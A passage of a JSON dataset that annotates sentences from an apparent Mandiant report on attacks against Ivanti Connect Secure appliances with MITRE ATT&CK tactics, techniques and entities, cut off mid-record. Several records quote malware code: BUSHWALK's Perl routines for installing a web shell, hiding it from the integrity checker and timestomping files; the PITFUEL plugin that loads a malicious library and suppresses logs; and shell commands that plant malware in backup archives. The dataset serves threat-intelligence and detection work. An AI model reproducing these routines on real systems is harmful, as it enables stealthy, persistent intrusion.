through file carving.", "sentence_text": "BUSHWALK Variant\nIn\nCutting Edge, Part 2 , we introduced a new web shell tracked as BUSHWALK associated with the exploitation of CVE-2024-21893 and CVE-2024-21887.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s38-4c8873", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 38, "context_before": "BUSHWALK Variant\nIn\nCutting Edge, Part 2 , we introduced a new web shell tracked as BUSHWALK associated with the exploitation of CVE-2024-21893 and CVE-2024-21887.", "sentence_text": "Similar to other web shells observed in this campaign, BUSHWALK is written in Perl and embedded into a legitimate Ivanti Connect Secure component, querymanifest.cgi checkVerison that enables arbitrary file read from the appliance.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" }, { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Embed web shell into legitimate component to enable arbitrary file read from the appliance.", "entities": [ { "text": "BUSHWALK", "start": 55, "end": 63, "label": "MalwareTool" }, { "text": "embedded into a legitimate Ivanti Connect Secure component, querymanifest.cgi checkVerison that enables arbitrary file read from the appliance", "start": 87, "end": 229, "label": "Action" }, { "text": "querymanifest.cgi", "start": 147, "end": 164, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s39-6b57f5", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 39, "context_before": "Similar to other web shells observed in this campaign, BUSHWALK is written in Perl and embedded into a legitimate Ivanti Connect Secure component, querymanifest.cgi checkVerison that enables arbitrary file read from the appliance.", "sentence_text": "The function is executed when the decrypted payload contains the string check.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s40-8fc2f2", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 40, "context_before": "The function is executed when the decrypted payload contains the string check.", "sentence_text": "sub checkVerison\n{\nmy ($file, $key)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s41-8c77b7", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 41, "context_before": "sub checkVerison\n{\nmy ($file, $key)", "sentence_text": "In addition, we have seen the threat actor demonstrate a nuanced understanding of the appliance and their ability to subvert detection throughout this campaign.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s42-cd3de6", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 42, "context_before": "In addition, we have seen the threat actor demonstrate a nuanced understanding of the appliance and their ability to subvert detection throughout this campaign.", "sentence_text": "We identified a technique allowing BUSHWALK to remain in an undetected dormant state by creatively modifying a Perl module and LotL technique by using built-in system utilities unique to Ivanti products.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" }, { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "Modify a Perl module and use built-in system utilities to keep BUSHWALK dormant and undetected.", "entities": [ { "text": "BUSHWALK", "start": 35, "end": 43, "label": "MalwareTool" }, { "text": "allowing BUSHWALK to remain in an undetected dormant state by creatively modifying a Perl module and LotL technique by using built-in system utilities unique to Ivanti products", "start": 26, "end": 202, "label": "Action" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s43-975729", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 43, "context_before": "We identified a technique allowing BUSHWALK to remain in an undetected dormant state by creatively modifying a Perl module and LotL technique by using built-in system utilities unique to Ivanti products.", "sentence_text": "To accomplish this, the threat actor first modifies a Perl module, DSUserAgentCap.pm , that evaluates incoming user agents.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "Modify a Perl module to alter behavior and evade detection.", "entities": [ { "text": "the threat actor", "start": 20, "end": 36, "label": "ThreatActor" }, { "text": "modifies a Perl module, DSUserAgentCap.pm", "start": 43, "end": 84, "label": "Action" }, { "text": "DSUserAgentCap.pm", "start": 67, "end": 84, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s44-e9c549", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 44, "context_before": "To accomplish this, the threat actor first modifies a Perl module, DSUserAgentCap.pm , that evaluates incoming user agents.", "sentence_text": "The modification enables the threat actor to either activate or deactivate BUSHWALK depending on the incoming HTTP request's user agent.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" }, { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "Modify behavior to activate or deactivate the web shell based on incoming HTTP request user agent.", "entities": [ { "text": "the threat actor", "start": 25, "end": 41, "label": "ThreatActor" }, { "text": "activate or deactivate BUSHWALK depending on the incoming HTTP request's user agent", "start": 52, "end": 135, "label": "Action" }, { "text": "BUSHWALK", "start": 75, "end": 83, "label": "MalwareTool" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s46-d90d4e", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 46, "context_before": "DSUserAgentCap.pm\n.", "sentence_text": "Note the difference in spelling between App1eWebKit and AppIeWebKit in the two user agent strings.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s47-a80e0e", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 47, "context_before": "Note the difference in spelling between App1eWebKit and AppIeWebKit in the two user agent strings.", "sentence_text": "sub getUserAgentType { my ($user_agent) = @_;", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s49-cc4ca9", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 49, "context_before": "if ($user_agent eq", "sentence_text": "Chrome/112.0.0.0 Safari/537.36\"){ system(\"mount -o remount,rw /\");\nsystem(\"/home/bin/configdecrypt /data/runtime\n/cockpit/diskAnalysis /data/runtime/cockpit/diskAnalysis.bak\");\nsystem(\"cp /home/webserver/htdocs/dana-na/jam/querymanifest.cgi\n/home/webserver/htdocs/dana-na/jam/querymanifest.cgi.bak\");\nsystem(\"echo '/home/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s50-5ca5c7", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 50, "context_before": "Chrome/112.0.0.0 Safari/537.36\"){ system(\"mount -o remount,rw /\");\nsystem(\"/home/bin/configdecrypt /data/runtime\n/cockpit/diskAnalysis /data/runtime/cockpit/diskAnalysis.bak\");\nsystem(\"cp /home/webserver/htdocs/dana-na/jam/querymanifest.cgi\n/home/webserver/htdocs/dana-na/jam/querymanifest.cgi.bak\");\nsystem(\"echo '/home/", "sentence_text": "webserver/htdocs/dana-na/jam\n/querymanifest.cgi' >> /home/etc/manifest/exclusion_list\");\nsystem(\"mv /data/runtime/cockpit/diskAnalysis.bak\n/home/webserver/htdocs/dana-na/jam/querymanifest.cgi\");\nsystem(\"chmod 755 /home/webserver/htdocs/dana-na/jam /querymanifest.cgi\");\nsystem(\"mkdir /debug\");\nsystem(\"/home/bin/restartServer.pl Restart\");\nexit(0);\n}\nelsif ($user_agent eq", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s51-06c91f", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 51, "context_before": "webserver/htdocs/dana-na/jam\n/querymanifest.cgi' >> /home/etc/manifest/exclusion_list\");\nsystem(\"mv /data/runtime/cockpit/diskAnalysis.bak\n/home/webserver/htdocs/dana-na/jam/querymanifest.cgi\");\nsystem(\"chmod 755 /home/webserver/htdocs/dana-na/jam /querymanifest.cgi\");\nsystem(\"mkdir /debug\");\nsystem(\"/home/bin/restartServer.pl Restart\");\nexit(0);\n}\nelsif ($user_agent eq", "sentence_text": "\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\nAppIeWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36\"){ system(\"mv /home/webserver/htdocs/dana-na/jam /querymanifest.cgi.bak /home/webserver/htdocs/dana-na/jam/querymanifest.cgi\");\nsystem(\"touch -r /home/webserver/htdocs/dana-na/auth /setcookie.cgi /home/webserver/htdocs/dana-na/jam/querymanifest.cgi\");\nsystem(\"/bin/sed -i '\\$d' /home/etc/manifest/exclusion_list\");\nsystem(\"rm -rf /debug\");", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s52-5d8513", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 52, "context_before": "\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\nAppIeWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36\"){ system(\"mv /home/webserver/htdocs/dana-na/jam /querymanifest.cgi.bak /home/webserver/htdocs/dana-na/jam/querymanifest.cgi\");\nsystem(\"touch -r /home/webserver/htdocs/dana-na/auth /setcookie.cgi /home/webserver/htdocs/dana-na/jam/querymanifest.cgi\");\nsystem(\"/bin/sed -i '\\$d' /home/etc/manifest/exclusion_list\");\nsystem(\"rm -rf /debug\");", "sentence_text": "system(\"mount -o remount,ro /\");\nexit(0);\n}\nelse{\nmy $type = DSClientTypes::getUserAgentType($user_agent);\nreturn $type;\n}\nAn encrypted version of BUSHWALK is placed in a directory excluded by the integrity checker tool (ICT) in /data/runtime/cockpit/diskAnalysis The activation routine (the if block) uses a built-in utility on the appliance located in /home/bin/configdecrypt used for decrypting the system's configuration.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s53-cf5a18", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 53, "context_before": "system(\"mount -o remount,ro /\");\nexit(0);\n}\nelse{\nmy $type = DSClientTypes::getUserAgentType($user_agent);\nreturn $type;\n}\nAn encrypted version of BUSHWALK is placed in a directory excluded by the integrity checker tool (ICT) in /data/runtime/cockpit/diskAnalysis The activation routine (the if block) uses a built-in utility on the appliance located in /home/bin/configdecrypt used for decrypting the system's configuration.", "sentence_text": "The routine executes the configdecrypt utility to decrypt diskAnalysis containing the BUSHWALK web shell.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" }, { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Execute configdecrypt utility to decrypt stored payload containing the BUSHWALK web shell.", "entities": [ { "text": "executes the configdecrypt utility to decrypt diskAnalysis containing the BUSHWALK web shell", "start": 12, "end": 104, "label": "Action" }, { "text": "configdecrypt", "start": 25, "end": 38, "label": "Infrastructure_Indicator" }, { "text": "diskAnalysis", "start": 58, "end": 70, "label": "Infrastructure_Indicator" }, { "text": "BUSHWALK", "start": 86, "end": 94, "label": "MalwareTool" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s54-9db255", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 54, "context_before": "The routine executes the configdecrypt utility to decrypt diskAnalysis containing the BUSHWALK web shell.", "sentence_text": "It then makes a backup of the original querymanifest.cgi file, adds it to the exclusion_list , moves BUSHWALK to the web server directory, and restarts the web server to load the web shell.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" }, { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "Backup original file, exclude it from integrity checks, move web shell to server directory, and restart service to activate it.", "entities": [ { "text": "makes a backup of the original querymanifest.cgi file", "start": 8, "end": 61, "label": "Action" }, { "text": "adds it to the exclusion_list", "start": 63, "end": 92, "label": "Action" }, { "text": "moves BUSHWALK to the web server directory", "start": 95, "end": 137, "label": "Action" }, { "text": "restarts the web server to load the web shell", "start": 143, "end": 188, "label": "Action" }, { "text": "querymanifest.cgi", "start": 39, "end": 56, "label": "Infrastructure_Indicator" }, { "text": "exclusion_list", "start": 78, "end": 92, "label": "Infrastructure_Indicator" }, { "text": "BUSHWALK", "start": 101, "end": 109, "label": "MalwareTool" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s55-ace56f", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 55, "context_before": "It then makes a backup of the original querymanifest.cgi file, adds it to the exclusion_list , moves BUSHWALK to the web server directory, and restarts the web server to load the web shell.", "sentence_text": "The deactivation routine (the elseif block) restores the original querymanifest.cgi file, timestomps it using touch to hide their activity, removes the path of BUSHWALK from exclusion_list , and restarts the web server.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1070.006", "name": "Timestomp" }, { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Restore original file, timestomp it to hide activity, remove web shell from exclusion list, and restart web server.", "entities": [ { "text": "restores the original querymanifest.cgi file", "start": 44, "end": 88, "label": "Action" }, { "text": "timestomps it using touch to hide their activity", "start": 90, "end": 138, "label": "Action" }, { "text": "removes the path of BUSHWALK from exclusion_list", "start": 140, "end": 188, "label": "Action" }, { "text": "restarts the web server", "start": 195, "end": 218, "label": "Action" }, { "text": "querymanifest.cgi", "start": 66, "end": 83, "label": "Infrastructure_Indicator" }, { "text": "BUSHWALK", "start": 160, "end": 168, "label": "MalwareTool" }, { "text": "exclusion_list", "start": 174, "end": 188, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s56-48ddb4", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 56, "context_before": "The deactivation routine (the elseif block) restores the original querymanifest.cgi file, timestomps it using touch to hide their activity, removes the path of BUSHWALK from exclusion_list , and restarts the web server.", "sentence_text": "However, the encrypted version of BUSHWALK remains dormant in a dynamic directory and therefore is not scanned by the integrity checker tool.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s57-298b32", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 57, "context_before": "However, the encrypted version of BUSHWALK remains dormant in a dynamic directory and therefore is not scanned by the integrity checker tool.", "sentence_text": "It continues to quietly persist in /data/runtime/cockpit/diskAnalysis until the threat actor activates it again.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Persist web shell in hidden directory until reactivation by the threat actor.", "entities": [ { "text": "continues to quietly persist in /data/runtime/cockpit/diskAnalysis", "start": 3, "end": 69, "label": "Action" }, { "text": "/data/runtime/cockpit/diskAnalysis", "start": 35, "end": 69, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s58-30d786", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 58, "context_before": "It continues to quietly persist in /data/runtime/cockpit/diskAnalysis until the threat actor activates it again.", "sentence_text": "The internal ICT is configured to run in two-hour intervals by default and is meant to be run in conjunction with continuous monitoring.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s59-fb0f1e", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 59, "context_before": "The internal ICT is configured to run in two-hour intervals by default and is meant to be run in conjunction with continuous monitoring.", "sentence_text": "Any malicious file system modifications made and reverted between the two-hour scan intervals would remain undetected by the ICT.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s60-89b11e", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 60, "context_before": "Any malicious file system modifications made and reverted between the two-hour scan intervals would remain undetected by the ICT.", "sentence_text": "When the activation and deactivation routines are performed tactfully in quick succession, it can minimize the risk of ICT detection by timing the activation routine to coincide precisely with the intended use of the BUSHWALK webshell.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s61-0b45ee", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 61, "context_before": "When the activation and deactivation routines are performed tactfully in quick succession, it can minimize the risk of ICT detection by timing the activation routine to coincide precisely with the intended use of the BUSHWALK webshell.", "sentence_text": "SparkGateway Plugin Abuse In a limited number of instances following exploitation of CVE-2024-21893, we identified the use of SparkGateway plugins to persistently inject shared objects and deploy backdoors.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505", "name": "Server Software Component" } ], "procedure": "Use SparkGateway plugins to inject shared objects and deploy backdoors for persistence.", "entities": [ { "text": "use of SparkGateway plugins to persistently inject shared objects and deploy backdoors", "start": 119, "end": 205, "label": "Action" }, { "text": "SparkGateway plugins", "start": 126, "end": 146, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s62-999e5a", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 62, "context_before": "SparkGateway Plugin Abuse In a limited number of instances following exploitation of CVE-2024-21893, we identified the use of SparkGateway plugins to persistently inject shared objects and deploy backdoors.", "sentence_text": "SparkGateway is a legitimate component of the Ivanti Connect Secure appliance that enables remote access protocols over a browser, such as RDP or SSH.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s63-6da0cd", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 63, "context_before": "SparkGateway is a legitimate component of the Ivanti Connect Secure appliance that enables remote access protocols over a browser, such as RDP or SSH.", "sentence_text": "The functionality of SparkGateway can be extended through plugins.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s64-bf79ae", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 64, "context_before": "The functionality of SparkGateway can be extended through plugins.", "sentence_text": "PITFUEL Plugin\nplugin.jar\n(PITFUEL) that loads the shared object libchilkat.so (LITTLELAMB.WOOLTEA) through the Java Native Interface (JNI) by calling System.load()\n.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "Load shared object via plugin using System.load() to maintain persistent execution.", "entities": [ { "text": "loads the shared object libchilkat.so (LITTLELAMB.WOOLTEA) through the Java Native Interface (JNI) by calling System.load()", "start": 41, "end": 164, "label": "Action" }, { "text": "plugin.jar", "start": 15, "end": 25, "label": "Infrastructure_Indicator" }, { "text": "libchilkat.so", "start": 65, "end": 78, "label": "Infrastructure_Indicator" }, { "text": "LITTLELAMB.WOOLTEA", "start": 80, "end": 98, "label": "MalwareTool" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s65-d2146a", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 65, "context_before": "PITFUEL Plugin\nplugin.jar\n(PITFUEL) that loads the shared object libchilkat.so (LITTLELAMB.WOOLTEA) through the Java Native Interface (JNI) by calling System.load()\n.", "sentence_text": "PluginManager\nclass in PITFUEL.\npublic class PluginManager { static { try { System.load(\"/home/runtime/SparkGateway/libchilkat.so\");\n} catch (Exception exception) {} try { Config config = Config.getInstance();\nconfig.remove(\"plugin\");\nconfig.remove(\"pluginFile\");\n} catch (Exception exception) {} try { Logger logger = Logger.getLogger(Config.class.getName());\nSparkGatewayFilter sparkGatewayFilter = new SparkGatewayFilter();\nlogger.setFilter(sparkGatewayFilter);\n} catch (Exception exception) {} } static class SparkGatewayFilter implements Filter { public boolean isLoggable(LogRecord param1LogRecord) { return (param1LogRecord.getLevel().intValue() != Level.\nSEVERE.intValue());\n}\n}\n}\nPluginManager\nclass of SparkGateway plugin (PITFUEL)", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1574.002", "name": "DLL Side-Loading" }, { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "Load malicious shared object via System.load and modify configuration and logging behavior to evade detection.", "entities": [ { "text": "System.load(\"/home/runtime/SparkGateway/libchilkat.so\")", "start": 76, "end": 131, "label": "Action" }, { "text": "config.remove(\"plugin\")", "start": 210, "end": 233, "label": "Action" }, { "text": "config.remove(\"pluginFile\")", "start": 235, "end": 262, "label": "Action" }, { "text": "logger.setFilter(sparkGatewayFilter)", "start": 427, "end": 463, "label": "Action" }, { "text": "/home/runtime/SparkGateway/libchilkat.so", "start": 89, "end": 129, "label": "Infrastructure_Indicator" }, { "text": "libchilkat.so", "start": 116, "end": 129, "label": "Infrastructure_Indicator" }, { "text": "PITFUEL", "start": 23, "end": 30, "label": "MalwareTool" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s66-3b471c", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 66, "context_before": "PluginManager\nclass in PITFUEL.\npublic class PluginManager { static { try { System.load(\"/home/runtime/SparkGateway/libchilkat.so\");\n} catch (Exception exception) {} try { Config config = Config.getInstance();\nconfig.remove(\"plugin\");\nconfig.remove(\"pluginFile\");\n} catch (Exception exception) {} try { Logger logger = Logger.getLogger(Config.class.getName());\nSparkGatewayFilter sparkGatewayFilter = new SparkGatewayFilter();\nlogger.setFilter(sparkGatewayFilter);\n} catch (Exception exception) {} } static class SparkGatewayFilter implements Filter { public boolean isLoggable(LogRecord param1LogRecord) { return (param1LogRecord.getLevel().intValue() != Level.\nSEVERE.intValue());\n}\n}\n}\nPluginManager\nclass of SparkGateway plugin (PITFUEL)", "sentence_text": "Upon execution,\nlibchilkat.so\n(LITTLELAMB.WOOLTEA) performs a number of initialization routines to ensure that it persistently runs in the background on the compromised system.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "Execute malware to initialize routines ensuring persistent background execution on the compromised system.", "entities": [ { "text": "performs a number of initialization routines to ensure that it persistently runs in the background on the compromised system", "start": 51, "end": 175, "label": "Action" }, { "text": "libchilkat.so", "start": 16, "end": 29, "label": "Infrastructure_Indicator" }, { "text": "LITTLELAMB.WOOLTEA", "start": 31, "end": 49, "label": "MalwareTool" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s67-d6aca4", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 67, "context_before": "Upon execution,\nlibchilkat.so\n(LITTLELAMB.WOOLTEA) performs a number of initialization routines to ensure that it persistently runs in the background on the compromised system.", "sentence_text": "Persistence Across System Upgrades and Patches Upon first execution, LITTLELAMB.WOOLTEA executes the first_run()\nfunction.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "Execute first_run function upon initial execution to establish persistence.", "entities": [ { "text": "executes the first_run()\nfunction", "start": 88, "end": 121, "label": "Action" }, { "text": "LITTLELAMB.WOOLTEA", "start": 69, "end": 87, "label": "MalwareTool" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s68-1ef775", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 68, "context_before": "Persistence Across System Upgrades and Patches Upon first execution, LITTLELAMB.WOOLTEA executes the first_run()\nfunction.", "sentence_text": "It calls the edit_current_data_backup()\nfunction that appends its malicious components to an archive, /data/pkg/data-backup.tgz .", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1574", "name": "Hijack Execution Flow" } ], "procedure": "Append malicious components to system archive to maintain persistence.", "entities": [ { "text": "calls the edit_current_data_backup()\nfunction that appends its malicious components to an archive", "start": 3, "end": 100, "label": "Action" }, { "text": "/data/pkg/data-backup.tgz", "start": 102, "end": 127, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-29_mandiant_report-p1-s69-9081e6", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 69, "context_before": "It calls the edit_current_data_backup()\nfunction that appends its malicious components to an archive, /data/pkg/data-backup.tgz .", "sentence_text": "gzip -d /data/pkg/data-backup.tgz > /dev/null 2>&1 tar -rf /data/pkg/data-backup.tar /data/runtime/SparkGateway/plugin.jar /data/runtime/SparkGateway/libchilkat.so /data/runtime/SparkGateway/gateway.conf > /dev/null 2>&1 gzip /data/pkg/data-backup.tar > /dev/null 2>&1 mv /data/pkg/data-backup.tar.gz /data/pkg/data-backup.tgz > /dev/null 2>&1 edit_current_data_backup()", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s70-e15090", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 70, "context_before": "gzip -d /data/pkg/data-backup.tgz > /dev/null 2>&1 tar -rf /data/pkg/data-backup.tar /data/runtime/SparkGateway/plugin.jar /data/runtime/SparkGateway/libchilkat.so /data/runtime/SparkGateway/gateway.conf > /dev/null 2>&1 gzip /data/pkg/data-backup.tar > /dev/null 2>&1 mv /data/pkg/data-backup.tar.gz /data/pkg/data-backup.tgz > /dev/null 2>&1 edit_current_data_backup()", "sentence_text": "During a system upgrade or when applying a patch, data-backup.tgz contains a backup of the data directory that is restored after the upgrade event.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s71-1f13a6", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 71, "context_before": "During a system upgrade or when applying a patch, data-backup.tgz contains a backup of the data directory that is restored after the upgrade event.", "sentence_text": "In addition, the function timestomps data-backup.tgz by calling utimensat .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s72-0fdd86", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 72, "context_before": "In addition, the function timestomps data-backup.tgz by calling utimensat .", "sentence_text": "This modification would ensure its malicious components ( plugin.jar , libchilkat.so , and gateway.conf ) persist across system upgrades and patches.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s73-4eefef", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 73, "context_before": "This modification would ensure its malicious components ( plugin.jar , libchilkat.so , and gateway.conf ) persist across system upgrades and patches.", "sentence_text": "(cd / ; tar -zxBf /data/pkg/data-backup.tgz >/dev/null 2>&1)\ndata-backup.tgz\nduring system upgrade events In addition, the malware contains a function named upgrade_monitor()\nthat supports persistence across system upgrade and patch events.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s74-5307fb", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 74, "context_before": "(cd / ; tar -zxBf /data/pkg/data-backup.tgz >/dev/null 2>&1)\ndata-backup.tgz\nduring system upgrade events In addition, the malware contains a function named upgrade_monitor()\nthat supports persistence across system upgrade and patch events.", "sentence_text": "We assess that this acts as a secondary persistence method by making a modification at the precise moment of a system upgrade or patch event.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s75-3f83ed", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 75, "context_before": "We assess that this acts as a secondary persistence method by making a modification at the precise moment of a system upgrade or patch event.", "sentence_text": "It monitors for system upgrade events by continually checking the filesystem for the existence of /tmp/data/root/dev .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s76-ac853c", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 76, "context_before": "It monitors for system upgrade events by continually checking the filesystem for the existence of /tmp/data/root/dev .", "sentence_text": "This path is used to support a system upgrade process.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s77-2e9aec", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 77, "context_before": "This path is used to support a system upgrade process.", "sentence_text": "In other words, the presence of the path indicates to the malware the existence of a system upgrade event.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-29_mandiant_report-p1-s78-a005bd", "source": "mandiant", "doc_id": "29_mandiant_report", "page_number": 1, "sentence_id": 78, "context_before": "In other words, the presence of the path indicates to the malware the existence of a system upgrade event.", "sentence_text": "If the path exists, it intervenes the system upgrade process by appending itself and its constituent components into the archive /tmp/data/root/samba_upgrade.tar .", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1574", "name": "Hijack Execution Flow" } ], "procedure": 